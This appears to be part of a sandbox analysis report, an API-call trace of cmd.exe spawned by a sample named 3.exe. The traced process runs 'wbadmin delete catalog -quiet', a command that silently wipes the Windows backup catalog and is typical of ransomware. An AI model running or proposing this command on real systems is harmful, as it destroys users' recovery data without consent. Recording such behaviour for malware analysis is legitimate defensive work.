	[0035.421] GetEnvironmentStringsW () returned 0x30ac80*
	[0035.421] GetProcessHeap () returned 0x2f0000
	[0035.421] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30cd80
	[0035.421] FreeEnvironmentStringsW (penv=0x30ac80) returned 1
	[0035.421] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0035.421] GetProcessHeap () returned 0x2f0000
	[0035.421] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cd80 | out: hHeap=0x2f0000) returned 1
	[0035.421] GetEnvironmentStringsW () returned 0x30ac80*
	[0035.421] GetProcessHeap () returned 0x2f0000
	[0035.421] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30cd80
	[0035.421] FreeEnvironmentStringsW (penv=0x30ac80) returned 1
	[0035.421] GetProcessHeap () returned 0x2f0000
	[0035.421] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308370 | out: hHeap=0x2f0000) returned 1
	[0035.421] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf0a8 | out: lpAttributeList=0x1cf0a8) 
	[0035.422] _get_osfhandle (_FileHandle=1) returned 0x7
	[0035.422] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0035.422] _get_osfhandle (_FileHandle=1) returned 0x7
	[0035.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0035.422] _get_osfhandle (_FileHandle=0) returned 0x3
	[0035.422] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0035.423] SetConsoleInputExeNameW () returned 0x1
	[0035.423] GetConsoleOutputCP () returned 0x1b5
	[0035.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0035.423] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0035.423] exit (_Code=0) 

Process:
	id = "5"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x50c26000"
	os_pid = "0x9a8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x958"
	cmd_line = "/C wbadmin delete catalog -quiet"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 25
	os_tid = 0x9ac

	[0033.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1dfe90 | out: lpSystemTimeAsFileTime=0x1dfe90*(dwLowDateTime=0xc1d0aa30, dwHighDateTime=0x1d5956c)) 
	[0033.626] GetCurrentProcessId () returned 0x9a8
	[0033.626] GetCurrentThreadId () returned 0x9ac
	[0033.626] GetTickCount () returned 0x1142b17
	[0033.626] QueryPerformanceCounter (in: lpPerformanceCount=0x1dfe98 | out: lpPerformanceCount=0x1dfe98*=15373051129) returned 1
	[0033.627] GetModuleHandleW (lpModuleName=0x0) returned 0x4a3b0000
	[0033.627] __set_app_type (_Type=0x1) 
	[0033.627] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3d7810) returned 0x0
	[0033.628] __getmainargs (in: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610, _DoWildCard=0, _StartInfo=0x4a3de0f4 | out: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610) returned 0
	[0033.628] GetCurrentThreadId () returned 0x9ac
	[0033.628] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9ac) returned 0x3c
	[0033.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.628] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0033.628] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0033.628] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0033.628] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dfe28 | out: phkResult=0x1dfe28*=0x0) returned 0x2
	[0033.629] VirtualQuery (in: lpAddress=0x1dfe10, lpBuffer=0x1dfd90, dwLength=0x30 | out: lpBuffer=0x1dfd90*(BaseAddress=0x1df000, AllocationBase=0xe0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.629] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x1dfd90, dwLength=0x30 | out: lpBuffer=0x1dfd90*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.629] VirtualQuery (in: lpAddress=0xe1000, lpBuffer=0x1dfd90, dwLength=0x30 | out: lpBuffer=0x1dfd90*(BaseAddress=0xe1000, AllocationBase=0xe0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.629] VirtualQuery (in: lpAddress=0xe4000, lpBuffer=0x1dfd90, dwLength=0x30 | out: lpBuffer=0x1dfd90*(BaseAddress=0xe4000, AllocationBase=0xe0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.629] VirtualQuery (in: lpAddress=0x1e0000, lpBuffer=0x1dfd90, dwLength=0x30 | out: lpBuffer=0x1dfd90*(BaseAddress=0x1e0000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.629] GetConsoleOutputCP () returned 0x1b5
	[0033.629] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.629] SetConsoleCtrlHandler (HandlerRoutine=0x4a3d3184, Add=1) returned 1
	[0033.629] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.629] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0033.630] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.630] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0033.630] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.630] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0033.630] _get_osfhandle (_FileHandle=0) returned 0x3
	[0033.630] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0033.630] GetEnvironmentStringsW () returned 0x3c8a60*
	[0033.631] GetProcessHeap () returned 0x3b0000
	[0033.631] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa7c) returned 0x3c94f0
	[0033.631] FreeEnvironmentStringsW (penv=0x3c8a60) returned 1
	[0033.631] GetProcessHeap () returned 0x3b0000
	[0033.631] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x8) returned 0x3c88e0
	[0033.631] GetEnvironmentStringsW () returned 0x3c8a60*
	[0033.631] GetProcessHeap () returned 0x3b0000
	[0033.631] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa7c) returned 0x3c9f80
	[0033.631] FreeEnvironmentStringsW (penv=0x3c8a60) returned 1
	[0033.631] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1dece8 | out: phkResult=0x1dece8*=0x44) returned 0x0
	[0033.631] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x0, lpData=0x1ded00*=0x18, lpcbData=0x1dece4*=0x1000) returned 0x2
	[0033.631] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x4, lpData=0x1ded00*=0x1, lpcbData=0x1dece4*=0x4) returned 0x0
	[0033.631] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x0, lpData=0x1ded00*=0x1, lpcbData=0x1dece4*=0x1000) returned 0x2
	[0033.631] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x4, lpData=0x1ded00*=0x0, lpcbData=0x1dece4*=0x4) returned 0x0
	[0033.631] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x4, lpData=0x1ded00*=0x40, lpcbData=0x1dece4*=0x4) returned 0x0
	[0033.631] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x4, lpData=0x1ded00*=0x40, lpcbData=0x1dece4*=0x4) returned 0x0
	[0033.631] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x0, lpData=0x1ded00*=0x40, lpcbData=0x1dece4*=0x1000) returned 0x2
	[0033.632] RegCloseKey (hKey=0x44) returned 0x0
	[0033.632] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1dece8 | out: phkResult=0x1dece8*=0x44) returned 0x0
	[0033.632] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x0, lpData=0x1ded00*=0x40, lpcbData=0x1dece4*=0x1000) returned 0x2
	[0033.632] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x4, lpData=0x1ded00*=0x1, lpcbData=0x1dece4*=0x4) returned 0x0
	[0033.632] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x0, lpData=0x1ded00*=0x1, lpcbData=0x1dece4*=0x1000) returned 0x2
	[0033.632] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x4, lpData=0x1ded00*=0x0, lpcbData=0x1dece4*=0x4) returned 0x0
	[0033.632] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x4, lpData=0x1ded00*=0x9, lpcbData=0x1dece4*=0x4) returned 0x0
	[0033.632] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x4, lpData=0x1ded00*=0x9, lpcbData=0x1dece4*=0x4) returned 0x0
	[0033.632] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1dece0, lpData=0x1ded00, lpcbData=0x1dece4*=0x1000 | out: lpType=0x1dece0*=0x0, lpData=0x1ded00*=0x9, lpcbData=0x1dece4*=0x1000) returned 0x2
	[0033.632] RegCloseKey (hKey=0x44) returned 0x0
	[0033.632] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc417d1
	[0033.632] srand (_Seed=0x5dc417d1) 
	[0033.632] GetCommandLineW () returned="/C wbadmin delete catalog -quiet"
	[0033.632] GetCommandLineW () returned="/C wbadmin delete catalog -quiet"
	[0033.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.632] GetProcessHeap () returned 0x3b0000
	[0033.632] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3caa10
	[0033.632] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3caa20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0033.633] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.633] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.633] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.633] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0033.633] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0033.633] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0033.633] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0033.633] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0033.633] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0033.633] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0033.633] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0033.633] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0033.633] GetProcessHeap () returned 0x3b0000
	[0033.633] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c94f0 | out: hHeap=0x3b0000) returned 1
	[0033.633] GetEnvironmentStringsW () returned 0x3c8a60*
	[0033.633] GetProcessHeap () returned 0x3b0000
	[0033.633] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa94) returned 0x3cac30
	[0033.633] FreeEnvironmentStringsW (penv=0x3c8a60) returned 1
	[0033.633] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0033.633] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.633] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0033.633] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0033.633] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0033.633] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0033.633] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0033.634] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0033.634] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0033.634] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0033.634] GetProcessHeap () returned 0x3b0000
	[0033.634] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x5c) returned 0x3cb6d0
	[0033.634] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1dfaf0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.634] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1dfaf0, lpFilePart=0x1dfad0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1dfad0*="Desktop") returned 0x25
	[0033.634] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.634] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1df800 | out: lpFindFileData=0x1df800*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3cb740
	[0033.634] FindClose (in: hFindFile=0x3cb740 | out: hFindFile=0x3cb740) returned 1
	[0033.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1df800 | out: lpFindFileData=0x1df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3cb740
	[0033.634] FindClose (in: hFindFile=0x3cb740 | out: hFindFile=0x3cb740) returned 1
	[0033.634] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20
	[0033.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1df800 | out: lpFindFileData=0x1df800*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9670240, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb9670240, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3cb740
	[0033.634] FindClose (in: hFindFile=0x3cb740 | out: hFindFile=0x3cb740) returned 1
	[0033.635] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.635] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1
	[0033.635] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1
	[0033.635] GetProcessHeap () returned 0x3b0000
	[0033.635] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cac30 | out: hHeap=0x3b0000) returned 1
	[0033.635] GetEnvironmentStringsW () returned 0x3cb740*
	[0033.635] GetProcessHeap () returned 0x3b0000
	[0033.635] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae8) returned 0x3cc230
	[0033.635] FreeEnvironmentStringsW (penv=0x3cb740) returned 1
	[0033.635] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.635] GetProcessHeap () returned 0x3b0000
	[0033.635] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cb6d0 | out: hHeap=0x3b0000) returned 1
	[0033.635] GetProcessHeap () returned 0x3b0000
	[0033.635] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4016) returned 0x3ccd20
	[0033.635] GetProcessHeap () returned 0x3b0000
	[0033.635] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x50) returned 0x3c9550
	[0033.636] GetProcessHeap () returned 0x3b0000
	[0033.636] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3ccd20 | out: hHeap=0x3b0000) returned 1
	[0033.636] GetConsoleOutputCP () returned 0x1b5
	[0033.636] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.636] GetUserDefaultLCID () returned 0x409
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a3e7b50, cchData=8 | out: lpLCData=":") returned 2
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1dfc00, cchData=128 | out: lpLCData="0") returned 2
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1dfc00, cchData=128 | out: lpLCData="0") returned 2
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1dfc00, cchData=128 | out: lpLCData="1") returned 2
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a3fa740, cchData=8 | out: lpLCData="/") returned 2
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a3fa4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a3fa460, cchData=32 | out: lpLCData="Tue") returned 4
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a3fa420, cchData=32 | out: lpLCData="Wed") returned 4
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a3fa3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a3fa3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a3fa360, cchData=32 | out: lpLCData="Sat") returned 4
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a3fa700, cchData=32 | out: lpLCData="Sun") returned 4
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a3e7b40, cchData=8 | out: lpLCData=".") returned 2
	[0033.637] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a3fa4e0, cchData=8 | out: lpLCData=",") returned 2
	[0033.637] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0033.638] GetProcessHeap () returned 0x3b0000
	[0033.638] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x20c) returned 0x3c9620
	[0033.638] GetConsoleTitleW (in: lpConsoleTitle=0x3c9620, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.639] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.639] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0
	[0033.639] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290
	[0033.639] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0
	[0033.639] GetProcessHeap () returned 0x3b0000
	[0033.639] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4012) returned 0x3ccd20
	[0033.639] GetProcessHeap () returned 0x3b0000
	[0033.639] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3ccd20 | out: hHeap=0x3b0000) returned 1
	[0033.640] _wcsicmp (_String1="wbadmin", _String2=")") returned 78
	[0033.640] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17
	[0033.640] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17
	[0033.640] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14
	[0033.640] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14
	[0033.640] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5
	[0033.640] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5
	[0033.640] GetProcessHeap () returned 0x3b0000
	[0033.640] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3c9840
	[0033.640] GetProcessHeap () returned 0x3b0000
	[0033.640] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x20) returned 0x3c45e0
	[0033.640] GetProcessHeap () returned 0x3b0000
	[0033.640] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x3e) returned 0x3c9900
	[0033.641] GetConsoleTitleW (in: lpConsoleTitle=0x1dfb10, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4
	[0033.642] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="START") returned 4
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19
